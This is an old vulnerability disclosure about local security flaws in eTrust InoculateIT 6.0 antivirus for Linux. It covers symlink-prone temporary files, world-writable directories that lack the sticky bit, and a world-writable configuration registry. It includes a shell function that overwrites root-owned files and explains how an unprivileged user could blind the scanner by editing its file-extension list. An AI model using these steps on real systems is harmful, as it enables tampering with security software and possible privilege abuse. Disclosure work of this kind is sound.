[local problems] eTrust Virus Protection 6.0 InoculateIT for linux

Type securityvulns
Reporter Securityvulns
Modified 2004-02-10T00:00:00


author: l0om <l0om@excluded.org> software: eTrust Virus Protection 6.0 InoculateIT for linux

local phun with etrust antivirus 6.0 inoculateIT linux ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eTrust InnoculateIT 6.0 comes for the following OSes: -windows 95/98/ME -windows nt 4.0/2000 -novell netware 3.x 4.x 5.x -lotus notes/domino -mircosoft exchange server -and finally linux (SuSE, RedHat, Caldera, Turbo Linux)

eTrust is a antivirus program which can scan nearly every fileformat for viruses. i have installed the version for linux on my SuSE 9.0 system and noticed the following security flaws:

1) possible symlink attacks in some scripts

by the way- the env variable $CAIGLBL0000 can be / usr/local/eTrust/ for example. however - the $CAIGLGL0000/tmp IS world writable...



[...] tfn=$CAIGLBL0000/tmp/.inoreg.ns.$$ $NETSTAT -i 2>/dev/null | grep -v localhost > $tfn [...]



local=$CAIGLBL0000/tmp local1=$CAIGLBL0000/scripts [...] $CAIGLBL0000/bin/unips > $local/unips.$$ awk -f $local1/uniftest.awk $local/unips.$$ st_rc=$? rm $local/unips.$$ [...]


       sed -e &quot;s!$from!$to!g&quot; $fn &gt; /

tmp/.unimove.sed #<-- creats it now diff $fn /tmp/.unimove.sed > /dev/null if [ $? != 0 -a -s /tmp/.unimove.sed ]; then mv /tmp/.unimove.sed $fn rm /tmp/.unimove.sed # dels it if finished

2) some directorys in /tmp dont have the sticky bit set an example:

eTrustAE.lnx/tmp/.caipcs/ # ls -l drwxrwxrwx 8 root root 240 2004-02-05 09:58 . drwxrwxrwx 4 root root 160 2004-02-09 16:53 .. drwxrwxrwx 2 root root 48 2004-02-05 09:54 .file -rw-r--r-- 1 root root 4110 2004-02-05 09:58 ipcrm.log drwxrwxrwx 2 root root 856 2004-02-05 10:48 .nob_event drwxrwxrwx 2 root root 1168 2004-02-05 10:48 .nob_mutex drwxrwxrwx 2 root root 48 2004-02-05 09:54 .nob_sem drwxrwxrwx 2 root root 384 2004-02-05 10:48 .sem drwxrwxrwx 2 root root 80 2004-02-05 10:48 .shm

eTrustAE.lnx/tmp/.caipcs # ls -l .sem drwxrwxrwx 2 root root 384 2004-02-05 10:48 . drwxrwxrwx 8 root root 240 2004-02-05 09:58 .. -rw------- 1 root root 20 2004-02-05 10:01 3571729 -rw------- 1 root root 5 2004-02-05 09:58 3702805 -rw------- 1 root root 25 2004-02-05 10:01 3735574 -rw------- 1 root root 25 2004-02-05 10:01 3768343 -rw------- 1 root root 15 2004-02-05 09:58 3801112

this directory includes values which are kinda sensetive. so only root can read or write them as we can see at this filepermissions. but as the upper directory /.sem has no sticky bit set and is world writeable. we can simple overwrite these files as the directory permissions are of a higher priority as the file permissions. this is the truth for a handful of directorys. for example:

badass~:> phun() { for i in `ls /usr/local/eTrustAE.lnx/ tmp/.caipcs/.sem`; do cp -f ~/myblankass.ascii /usr/local/eTrustAE.lnx/ tmp/.caipcs/.sem/$i done echo jupp } badass~:> phun jupp badass~:>

3) world writeable

with the linux version of etrust there come some directroys which we all know- the "registry". it seems like the whole registry key is world writeable:

>find ./ -type f -perm -2 -print ./registry/hkey_current_user/software/ computerassociates/inoculateit/6.0/local_scanner/ macro_cure_action ./registry/hkey_current_user/software/ computerassociates/inoculateit/6.0/local_scanner/ scan_files ./registry/hkey_current_user/software/ computerassociates/inoculateit/6.0/local_scanner/ log_infected_files ./registry/hkey_current_user/software/ computerassociates/inoculateit/6.0/local_scanner/ specified_list ./registry/hkey_local_machine/software/ computerassociates/scanengine/path/home ./registry/hkey_local_machine/software/ computerassociates/scanengine/path/logs [...]

they got the sticky bit set, therefore we cannot overwrite or delte them, but sometimes we can change sensetive values in the registry. for example:

cat ./registry/hkey_current_user/software/ computerassociates/inoculateit/6.0/local_scanner/ specified_list |COM|DLL|DOT|DOC|EXE|SYS|VXD|XLA|XLS|XLT|XLW|RTF|WIZ| 386|ADT|BIN|CBT|CLA|CPL|CSC|DRV|HTM|HTT|JS|MDB|MSO| POT| PPT|SCR|SHS|VBS|VSD|VST|VSS|OCX|HLP|CHM|MSI|VBE|JSE| PIF|BAT|

this key contains a list of fileends which specifies what files should be scaned for a virus. a normal user can simply delte all values except one from this list, and can make the scanner pretty lame... furthermore there are worldwritable keys like "windows/currentversion", with keys which include the path to the normal binarys ("/usr/bin"). it may be possible to execute whatever you want on a reboot if you change the right keys in the right way.

have phun! feel phree! life phat!

YaCP - (Y)ast (a)nother (C)yber(P)unk

--l0om --www.excluded.org